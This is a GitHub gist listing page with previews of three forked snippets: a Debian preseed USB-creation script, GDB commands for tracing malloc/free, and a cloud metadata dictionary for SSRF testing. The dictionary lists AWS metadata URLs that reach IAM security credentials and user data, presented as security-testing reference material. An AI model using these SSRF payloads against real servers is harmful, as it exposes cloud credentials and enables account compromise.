Skip to content

Instantly share code, notes, and snippets.

View Matir's full-sized avatar

David Tomaschik Matir

647 followers · 44 following
View GitHub Profile
@Matir
Matir / create-debian-usb-key.sh
Created November 12, 2019 18:58 — forked from nmaupu/create-debian-usb-key.sh
Create Debian USB key automatic installation (preseed)
#!/usr/bin/env bash
set -e -x -o pipefail
DIRNAME="$(dirname $0)"
DISK="$1"
: "${DEBIAN_RELEASE:=stretch}"
: "${DEBIAN_VERSION:=9.2.1}"
: "${DEBIAN_MIRROR:=http://ftp.debian.org}"
@Matir
Matir / cloud_metadata.txt
Last active June 14, 2018 21:56 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@Matir
Matir / README.md
Last active March 8, 2017 20:19 — forked from ayosec/README.md
GDB commands to trace calls to malloc/free

Attach to a running process with

  gdb -x trace-dyn-mem -p $PID

After every malloc the returned value (the allocated address) will be read from the RAX (64 bits) register.

After every free the last item in the backtrace (the free itself) will be shown. With the libc6-dbg package installed you can see the address passed as the first argument of free.